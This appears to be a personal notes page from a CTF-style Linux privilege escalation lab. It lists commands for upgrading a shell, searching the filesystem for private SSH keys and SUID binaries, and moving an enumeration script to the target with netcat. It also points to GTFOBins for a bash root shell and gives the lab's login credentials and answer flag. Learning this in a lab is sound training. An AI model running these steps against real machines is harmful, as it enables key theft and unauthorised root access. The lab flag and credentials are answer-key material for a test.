The Rogue Gnome
Networking - Priv Esc
Last updated
Was this helpful?
Networking - Priv Esc
Last updated
Was this helpful?
whoami
name of the account
echo $0
our shell
python -c 'import pty; pty.spawn("/bin/bash")'
spawn another shell and make it interactive
We're using find
to search the volume, by specifying the root (/
) to search for files named "id_rsa" which is the name for private SSH keys, and then using 2> /dev/null
to only show matches to us.
find / -name id_rsa 2> /dev/null
Determining the kernel of the machine (kernel exploitation such as Dirtyc0w)
Locating other services running or applications installed that may be abusable (SUID & out of date software)
Looking for automated scripts like backup scripts (exploiting crontabs)
Credentials (user accounts, application config files..)
Mis-configured file and directory permissions
find / -perm -u=s -type f 2>/dev/null
python3 -m http.server 8080
nc -l -p 1337 > LinEnum.sh
nc -w -3 10.10.6.64 1337 < LinEnum.sh
"/var/log/auth.log" (Attempted logins for SSH, changes too or logging in as system users:)
"/var/log/syslog" (System events such as firewall alerts:)
"/var/log/<service/" -- /var/log/apache2/access.log"
vertical
sudo
group?sudoers
ssh cmnatic@10.10.6.64
Input the following password when prompted: aoc2020
No answer needed
You may find uploading some of the enumeration scripts that were used during today's task to be useful.
https://gtfobins.github.io/gtfobins/bash/
No answer needed
Use this executable to launch a system shell as root.
thm{2fb10afe933296592}